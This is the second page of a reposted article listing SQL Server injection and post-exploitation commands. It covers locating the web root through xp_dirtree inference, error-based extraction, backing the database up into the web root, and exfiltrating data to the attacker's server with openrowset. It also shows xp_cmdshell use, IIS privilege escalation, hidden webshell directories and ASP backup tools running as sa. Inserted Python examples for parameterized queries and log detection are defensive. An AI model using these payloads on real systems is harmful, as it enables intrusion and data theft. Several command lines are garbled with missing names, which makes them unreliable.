SoFunction
Updated on 2025-04-10

The most detailed SQL injection-related commands sorted out (reposted) page 2/2


8) Use SQL statements to find the WEB directory: from experience, the WEB root directory is most often on drive D, then E, then C. First, create a temporary table to store the directory tree generated by master..xp_dirtree (which the public role can execute), using the following statement:
;create table temp(dir nvarchar(255),depth varchar(255));--
The dir field of this table holds the name of a directory and the depth field its depth. Then execute xp_dirtree to obtain the directory tree of drive D with the following statement:
;insert temp(dir,depth) exec .xp_dirtree 'd:';-- 

Before performing the following operations, first check how many folders there are on drive D, to get a general picture of it. The statement is:
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM Volume'))>=N (N = 0, 1, 2, 3 ...)

Next, look for several first-level subdirectories of the target website, such as user and photo, and use filtering to determine whether the WEB root directory is on this drive. The statement is:
and (select count(*) from temp where dir<>'user')<(select count(*) from temp) 

Look at the result of the statement. If it is true, the WEB root directory may be on this drive. For further confirmation, test several more subdirectories:
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp) 

... 

If all test results are true, it means that the WEB root directory is very likely on this disk.

Assuming the WEB root directory is on this drive, use the following statement to obtain the depth of a first-level subdirectory:
and (select depth from temp where dir='user')>=N (N = 1, 2, 3 ...)

Assuming the depth obtained is 3, the user directory is a level-3 directory of drive D, so the WEB root directory is a level-2 directory of drive D.

We now know the drive letter and the depth of the root directory. To find its exact location, search the directories of drive D one by one starting from the top. There is no need to learn the name of every directory; that would take too much time.

Next, another temporary table is created to store all directories in the level 1 subdirectory of disk D. The statement is as follows:

;create table temp1(dir nvarchar(255),depth varchar(255));-- 

Then save all directories under the first first-level subdirectory of drive D to temp1 with the following statement:
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM Volume') order by dir desc)T order by dir);insert into temp1 exec .xp_dirtree @dirname
To save all directories under the second first-level subdirectory of drive D into temp1 instead, change the second top 1 to top 2.

Now all directories under the first first-level subdirectory of drive D are saved in temp1. Use the same method to determine whether the root directory is inside this first-level subdirectory:
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1) 
If it returns true, the root directory may be in this subdirectory; remember to test a few more examples. If all of them return false, the WEB root directory is not in this directory. Then use the same method to obtain the list of all directories under the second and third first-level subdirectories of drive D and check whether the WEB root directory is under them. Be careful to delete the contents of temp1 before running xp_dirtree again.

Now suppose the WEB root directory is inside a first-level subdirectory of drive D named website. I don't need to say anything about how to obtain this directory's name. Because we learned earlier that the depth of the WEB root directory is 2, we need to find which directory under website is the real WEB root directory.

Now, we use the same method to create the third temporary table:
;create table temp2(dir nvarchar(255),depth varchar(255));-- 

Then save all directories under website on drive D to temp2 with the following statement:
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM Volume') order by dir desc)T order by dir);insert into temp2 exec .xp_dirtree @dirname
To save all directories under the second subdirectory of website into temp2 instead, change the second top 1 to top 2.

Now use the same method to determine whether this directory is the root directory:
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2) 
If it returns true, test several more examples with the method described above to confirm. If multiple examples return true, the directory is the WEB root directory.


You can basically obtain the WEB root directory using the above method. Now let's assume that the WEB root directory is: D:\website\www
Then we can back up the current database to this directory for download. Before the backup, clear the contents of temp, temp1 and temp2, and save the directory trees of drives C, D and E into temp, temp1 and temp2 respectively.

After downloading the database, remember to drop the three temporary tables. The downloaded database now contains all the directory listings, including the background management directories and more.

21. Under Win2000, promote the WEB user to SYSTEM permissions (administrator permission is required to run this):
c:\>cscript C:\Inetpub\AdminScripts\ set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\" "C:\WINNT\system32\inetsrv\" "C:\WINNT\system32\inetsrv\" "C:\WINNT\system32\inetsrv\" "C:\WINNT\system32\" "C:\winnt\system32\inetsrv\"

cscript C:\Inetpub\AdminScripts\ set /W3SVC/InProcessIsapiApps "C:\windows\system32\" "C:\windows\system32\inetsrv\" "C:\windows\system32\inetsrv\" "C:\windows\system32\inetsrv\" "C:\windows\system32\" "C:\windows\system32\inetsrv\"

Check whether it is successful:
c:\>cscript C:\Inetpub\AdminScripts\ get w3svc/inprocessisapiapps 

Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
inprocessisapiapps       : (LIST) (6 Items)
"C:\WINNT\system32\"
"C:\WINNT\system32\inetsrv\"
"C:\WINNT\system32\inetsrv\"
"C:\WINNT\system32\inetsrv\"
"C:\WINNT\system32\"
"c:\winnt\system32\inetsrv\"

22. How to hide ASP *s:
Create a non-standard directory: mkdir images..\
Copy the ASP * to the directory: copy c:\inetpub\wwwroot\ c:\inetpub\wwwroot\images..\
Accessing ASP * via web: http://ip/images../?action=login
How to delete non-standard directories: rmdir images..\ /s

23. Remove the NTLM authentication of telnet:
;exec .xp_cmdshell 'tlntadmn config sec = -ntlm'—

24. Use echo to write a download script to a file:
(1)echo Set x= createObject(^"^"): ^"GET^",LCase((0)),0:():Set s = createObject(^"^"): = 3: = 1:():(): LCase((1)),2 >c:\

(2)c:\>cscript  http://127.0.0.1/asp/  


25. Method to manually create an IIS hidden directory:
• View the local virtual directory list: c:\inetpub\AdminScripts\ enum w3svc/1/root
• Create a new kiss directory: mkdir c:\asp\kiss
• Create a kiss virtual directory: c:\inetpub\AdminScripts\ -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"
• Add execute and write permissions to the kiss directory:
 c:\inetpub\AdminScripts\ set w3svc/1/root/kiss/kiss/accesswrite "true" -s: 
 c:\inetpub\AdminScripts\ set w3svc/1/root/kiss/accessexecute "true" -s:
• ?: Cscript c:\inetpub\AdminScripts\ set /w3svc/1/root/kiss/createprocessasuser false
• Access: http://127.0.0.1/kiss/

26. Use openrowset() to connect back to a local instance for testing:
select a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM [dvbbs].[dbo].[dv_admin]') AS a

select * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM [dvbbs].[dbo].[dv_admin]')

27. Obtain the host name:
/?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername

28. Obtain the database username:
/?id=1 and 1=convert(int,system_user)--
http:///?id=49 and user>0
select user
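The checks in sections 8, 27 and 28 only work because the page splices the id parameter straight into its SQL text. The following example is added here and is not from the original article: it uses an in-memory SQLite database as a stand-in for SQL Server (the table names news and temp and their contents are constructed), because the point is the query construction rather than the engine. lookup_unsafe reproduces the injectable pattern, so a section-8 style condition on temp acts as a true/false oracle that returns or withholds the row; lookup_safe validates the id as an integer and binds it as a parameter, so the same input never reaches the database as SQL.

```python
import sqlite3

# Constructed stand-in for the injectable page: a news table queried by ?id=,
# plus a temp table like the one section 8 fills with xp_dirtree output.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (1, 'hello'), (2, 'world');
        CREATE TABLE temp(dir TEXT, depth TEXT);
        INSERT INTO temp VALUES ('user', '3'), ('photo', '3');
    """)
    return con

# Section-8 style probe: true because a row named 'user' exists in temp.
PROBE_TRUE = "1 and (select count(*) from temp where dir<>'user')<(select count(*) from temp)"
# Same shape for a name that is not in temp, so the comparison is false.
PROBE_FALSE = "1 and (select count(*) from temp where dir<>'nothere')<(select count(*) from temp)"

def lookup_unsafe(con, user_id):
    """Vulnerable form: the raw parameter is concatenated into the SQL text, so any
    appended condition is evaluated by the engine and the row's presence leaks it."""
    sql = "SELECT title FROM news WHERE id=" + user_id
    return [row[0] for row in con.execute(sql)]

def lookup_safe(con, user_id):
    """Hardened form: reject anything that is not a plain integer, then bind the
    value as a parameter so the database only ever sees a fixed statement."""
    if not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    rows = con.execute("SELECT title FROM news WHERE id=?", (int(user_id),))
    return [row[0] for row in rows]

def compare(user_id):
    """Run one input through both lookups; the safe path reports 'rejected'
    instead of ever reaching the database with non-numeric input."""
    con = make_db()
    try:
        safe = lookup_safe(con, user_id)
    except ValueError:
        safe = "rejected"
    return {"unsafe": lookup_unsafe(con, user_id), "safe": safe}

if __name__ == "__main__":
    for probe in ("1", PROBE_TRUE, PROBE_FALSE):
        print(probe[:40].ljust(40), compare(probe))
```

With the unsafe lookup, PROBE_TRUE returns the row and PROBE_FALSE returns nothing, which is exactly the one-bit oracle the directory search in section 8 relies on; with parameter binding both probes are refused before any SQL runs. The stacked statements in the later sections (create table, xp_dirtree, backup database) depend on the same splice, so binding the parameter removes them as well; running the web login with a low-privilege account instead of sa is the complementary control.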

29. A second method for ordinary users to obtain a WEBSHELL:
• Pack:
EXEC [master].[dbo].[xp_makecab] 'c:\','default',1,'d:\'
• Unpack (can be used to obtain a webshell):
EXEC [master].[dbo].[xp_unpackcab] 'C:\','c:',1, ''
• Read the content of any file (requires dbo permission on master):
EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\' 

30. With sa permission and a known WEB path, back up the database directly to the WEB path.

/?id=1;backup database Database name to disk='c:\inetpub\wwwroot\'
This backs up all the obtained data to the WEB directory; then download the file over HTTP (you must know the WEB virtual directory first).

• Dump the system's directory structure and analyze the results to discover the WEB virtual directory. First create a temporary table, temp:
/?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
Next, use xp_availablemedia to obtain all current drives and save them in the temp table:
/?id=1;insert temp exec .xp_availablemedia;--
• The drive list and related information can be obtained by querying temp, or use xp_subdirs to obtain the subdirectory list and store it in the temp table:
/?id=1;insert into temp(id) exec .xp_subdirs 'c:\';--
• xp_dirtree can also be used to obtain the directory tree of all subdirectories and put it into the temp table:
/?id=1;insert into temp(id,num1) exec .xp_dirtree 'c:\';--
This way you can browse the complete list of directories (folders).
• To view the content of a file, execute xp_cmdshell:
;insert into temp(id) exec .xp_cmdshell 'type c:\web\';--
• Use the 'bulk insert' syntax to insert a text file into the temporary table, for example: bulk insert temp(id) from 'c:\inetpub\wwwroot\'
Browse temp to see the content of the file. By analyzing the various ASP files you can obtain a large amount of system information, WEB construction and management information, and even the connection password of the SA account.

31. Summary of some SQL Server extended stored procedures (name, description, example call):
xp_availablemedia: Displays the drive letters available on the system (e.g. 'C:\'). Example: xp_availablemedia
xp_enumgroups: Lists the current system's user groups and their descriptions. Example: xp_enumgroups
xp_enumdsn: Lists the ODBC data source names configured on the system. Example: xp_enumdsn
xp_dirtree: Displays the subdirectories and file structure of a directory. Example: xp_dirtree 'C:\inetpub\wwwroot\'
xp_getfiledetails: Gets the attributes of a file. Example: xp_getfiledetails 'C:\inetpub\'
dbo.xp_makecab: Compresses files on the target machine into one cabinet file; the files to include are listed after the parameters, separated by commas. Example: dbo.xp_makecab 'C:\','evil',1,'C:\inetpub\'
xp_unpackcab: Decompresses a cabinet file. Example: xp_unpackcab 'C:\','C:\temp',1
xp_ntsec_enumdomains: Lists the server's domain name. Example: xp_ntsec_enumdomains
xp_servicecontrol: Stops or starts a service. Example: xp_servicecontrol 'stop','schedule'
xp_terminate_process: Stops a running program by its pid. Example: xp_terminate_process 123
dbo.xp_subdirs: Lists the subdirectories of a directory.
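Every technique in sections 8 and 27 through 31 arrives at the web server as a query string, so the IIS log is where a defender can see it. The following example is added here and is not from the original article: it parses constructed W3C-format log lines (the addresses, paths and the shop database name are made up; the payloads mirror the article's), URL-decodes the query, tags it with the indicator families the article uses (extended procedures, stacked statements, backup ... to disk, openrowset, convert(int, ...) error extraction, count(*) inference), and separately flags the burst of near-identical requests that the section-8 depth and count probes produce, by masking the numbers and counting repeats per client and URI.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample lines in IIS W3C format (fields: date time c-ip cs-method
# cs-uri-stem cs-uri-query sc-status). Not real server logs.
SAMPLE_LOG = """\
2025-04-10 10:00:01 198.51.100.7 GET /list.asp id=1 200
2025-04-10 10:00:02 198.51.100.7 GET /list.asp id=1;create+table+temp(dir+nvarchar(255),depth+varchar(255));-- 200
2025-04-10 10:00:03 198.51.100.7 GET /list.asp id=1;insert+temp(dir,depth)+exec+xp_dirtree+'d:';-- 200
2025-04-10 10:00:04 198.51.100.7 GET /list.asp id=1+and+(select+count(*)+from+temp+where+depth%3D1)%3E%3D1 200
2025-04-10 10:00:05 198.51.100.7 GET /list.asp id=1+and+(select+count(*)+from+temp+where+depth%3D1)%3E%3D2 200
2025-04-10 10:00:06 198.51.100.7 GET /list.asp id=1+and+(select+count(*)+from+temp+where+depth%3D1)%3E%3D3 500
2025-04-10 10:00:07 198.51.100.7 GET /list.asp id=1+and+1%3Dconvert(int,%40%40servername)-- 500
2025-04-10 10:00:08 198.51.100.7 GET /list.asp id=1;backup+database+shop+to+disk%3D'c:%5Cinetpub%5Cwwwroot%5Cshop.bak' 200
2025-04-10 10:00:09 203.0.113.5 GET /list.asp id=42 200
2025-04-10 10:00:10 203.0.113.5 GET /news.asp id=7 200
"""

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)

# Indicator families, named after the sections of the article they come from.
INDICATORS = [
    ("extended_proc", re.compile(
        r"\bxp_(?:cmdshell|dirtree|subdirs|availablemedia|makecab|unpackcab|"
        r"readerrorlog|servicecontrol|terminate_process)\b", re.I)),
    ("stacked_query", re.compile(r";\s*(?:create|insert|declare|drop|backup|exec)\b", re.I)),
    ("backup_to_disk", re.compile(r"\bbackup\s+database\b.*\bto\s+disk\b", re.I)),
    ("openrowset", re.compile(r"\bopenrowset\s*\(", re.I)),
    ("error_based", re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),
    ("boolean_inference", re.compile(
        r"\band\s*\(\s*select\s+count\s*\(\s*\*\s*\)\s+from\b", re.I)),
]
DIGITS = re.compile(r"\d+")

def parse_line(line):
    """Split one W3C line into fields and add the URL-decoded query ('+' -> space)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["query"])
    return rec

def classify(decoded_query):
    """Return the names of every indicator family that matches the decoded query."""
    return [name for name, rx in INDICATORS if rx.search(decoded_query)]

def scan(log_text):
    """Return (ip, stem, decoded_query, tags) for each line with at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["decoded"])
        if tags:
            hits.append((rec["ip"], rec["stem"], rec["decoded"], tags))
    return hits

def inference_bursts(log_text, threshold=3):
    """Count inference requests per (client, URI, query-with-numbers-masked).
    A depth or count probe loop sends many requests that differ only in N,
    so a high count for one shape is the signature of the section-8 search."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and "boolean_inference" in classify(rec["decoded"]):
            shape = DIGITS.sub("N", rec["decoded"])
            counts[(rec["ip"], rec["stem"], shape)] += 1
    return {key: n for key, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    for ip, stem, query, tags in scan(SAMPLE_LOG):
        print(ip, stem, tags, query[:60])
    for (ip, stem, shape), n in inference_bursts(SAMPLE_LOG).items():
        print("burst:", ip, stem, n, shape)
```

The decode step matters: the article's payloads reach the server with spaces as '+' and '=' as %3D, and a pattern applied to the raw cs-uri-query field would miss most of them. The burst counter is what catches a patient attacker whose individual probes look like ordinary boolean conditions.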

32. A sp_MSforeachObject stored procedure (runs a command for each object of a given type):
USE MASTER
GO
create proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its 
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
    end
/* create the select */
/* Use @isobject variable instead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' + 
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from  o '
+ N' where OBJECTPROPERTY(, N'''+@isobject+''') = 1 '+N' and  & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
    exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
    exec(@postcommand)
return @retval
GO


/*
1. Get the scripts of all stored procedures:
EXEC sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2. Get the scripts of all views:
EXEC sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2
3. Change the owner of all tables, views, triggers and procedures to dbo:
EXEC sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEC sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEC sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEC sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/

33. Database backup method under DB_OWNER permission
Use openrowset to connect back to your own database machine. First build a table locally with the same structure as the target's table, using nvarchar for the field types. Then connect to the target's SQL database through Ocean and execute the following in Query Analyzer:
insert into OPENROWSET ('sqloledb','server=IP of your database server;uid=user;pwd=pass;database=dbname;','select * from the table you created) select * from The other party’s table—
If the data volume is too large, check whether the table has an auto-numbered field and transfer it in ranges like this: select * from Table name where id>100
If the database is on the same host as the WEB server, you can BAK the database directly into the WEB directory. But the database cannot be too large: if it exceeds 2G, SQL will time out.
If you have SA permissions, you can use the following two ASP programs to back up the database:


<HTML>
<HEAD>
<TITLE>SQL Server database backup and recovery</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
Select operation: <INPUT TYPE="radio" NAME="act"  value="backup"><label for=act_backup>Backup</label>
<INPUT TYPE="radio" NAME="act"  value="restore"><label for=act_restore>Recover</label>
<br>Database name: <INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>File path: <INPUT TYPE="text" NAME="bak_file" value="c:\">(Back or restored file path, backing up to EXE is mainly for the convenience of downloading and living...)<br>
<input type="submit" value="OK">
</form>
<%
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'sql server
sqlname = "sa" 'Username
sqlpassword = "Database Password" ' Password
sqlLoginTimeout= 15 'Login timeout
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
 "input database name"
else
if act = "backup" then
Set srv=("")
 = sqlLoginTimeout
 sqlserver,sqlname, sqlpassword
Set bak = ("")
=databasename
=Files
=bak_file
 srv
if >0 then
 &"<font color=red><br>"
 &"</font>"
end if
"<font color=green>Backup successful!</font>"
elseif act = "restore" then
'Recovery should be done when the database is not used!
Set srv=("")
 = sqlLoginTimeout
 sqlserver,sqlname, sqlpassword
Set rest=("")
=0 ' full db restore
=databasename
=Files
=bak_file
=True 'Force restore over existing database
if >0 then
 &"<font color=red><br>"
 &"</font>"
end if
 srv

"<font color=green>Recover successfully!</font>"
else
"<font color=red>No operation selected</font>"
end if
end if
%>
</BODY>
</HTML>


<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:///TR/xhtml1/DTD/">
<html xmlns="http:///1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Caifeiyang ASP backup MSSQL database program V1.0--QQ:79998575</title>
</head>
<style>
BODY {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   scrollbar-face-color:#E4E4F3;   scrollbar-highlight-color:#FFFFFF;   scrollbar-3dlight-color:#E4E4F3;   scrollbar-darkshadow-color:#9C9CD3;   scrollbar-shadow-color:#E4E4F3;   scrollbar-arrow-color:#4444B3;   scrollbar-track-color:#EFEFEF;}TABLE {   FONT-SIZE: 9pt;   FONT-FAMILY: "Courier New";   BORDER-COLLAPSE: collapse;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: solid;   border-right-style: none;   border-bottom-style: none;   border-left-style: solid;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.tr {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   text-align: center;}.td {   font-family: "Courier New";   font-size: 9pt;   background-color: #f9f9fd;}.warningColor {   font-family: "Courier New";   font-size: 9pt;   color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea {   font-family: "Courier New";   BORDER-TOP-WIDTH: 1px;   BORDER-LEFT-WIDTH: 1px;   FONT-SIZE: 12px;   BORDER-BOTTOM-WIDTH: 1px;   BORDER-RIGHT-WIDTH: 1px;   color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   TEXT-DECORATION: none;}tr {   font-family: "Courier New";   font-size: 9pt;   line-height: 18px;}td {   font-family: "Courier New";   font-size: 9pt;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: none;   border-right-style: solid;   border-bottom-style: solid;   border-left-style: none;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.trHead {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   line-height: 3px;}.inputLogin {   font-family: "Courier New";   font-size: 9pt;   border: 1px solid #d8d8f0;   background-color: #f9f9fd;   vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">Caifeiyang ASP backup MSSQL database program V1.0 </font></td>
</tr>
<tr>
<td>Select action:
  <input type="radio" name="act" value="backup" />
<label for=act_backup>Backup</label>
  <input type="radio" name="act"  value="restore" />
<label for=act_restore>Recover</label></td>
</tr>
<tr>
<td><label>SQL Server:
  <input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>Username:
  <input name="sqlname" type="text" value="sa" />
password:
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>Database name:
  <input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td> file path:
  <input name="bak_file" type="text" value="<% =("\")&"\"&""%>" size="60" />
(Backup or restored file path)</td>
</tr>
<tr>
<td><%  "Absolute path to this file:" %>
  <font color="#FF0000">
  <% =(("SCRIPT_NAME")) %>
  </font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="OK" />
<input name="Submit" type="reset" class="liuyes" size="10" value="Reset" /></td>
</tr>
</table>
</form> 
<table width="686" border="1" align="center">
<tr>
<td>Prompt message: <%
if request("action")="" then   
"<font color=#ff0000>No need to say anything more!</font>"
end if
'Backup and recovery of SQL Server database!
if request("action")="backupdatabase" Then 
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act 
sqlserver = trim(request("sqlserver"))
sqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
sqlLoginTimeout = 15
databasename = trim(request("databasename")) 
bak_file = trim(request("bak_file")) 
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
"<font color=#ff0000>No database name entered!</font>"
else
if act = "backup" then
Set srv=("")
 = sqlLoginTimeout
 sqlserver,sqlname, sqlpassword
Set bak = ("")
=databasename
=Files 
   = 0
   = 1
'   = True
=bak_file 
 srv
if >0 then 
 &"<font color=red><br>" 
 &"</font>" 
end if
"<font color=green>Backup successful!</font>"
elseif act="restore" then
'Recovery should be done when the database is not used!
Set srv=("")
 = sqlLoginTimeout
 sqlserver,sqlname, sqlpassword
Set rest=("")
=0 ' full db restore 
=databasename 
=Files 
=bak_file 
=True 'Force restore over existing database 
if >0 then
 &"<font color=red><br>"
 &"</font>"
end if
 srv
"<font color=green>Recover successfully!</font>"
else 
"<font color=red>Please select backup or restore!</font>"
end if 
end if 
end if
%></td>
</tr>
</table> 
</body>
</html> 
 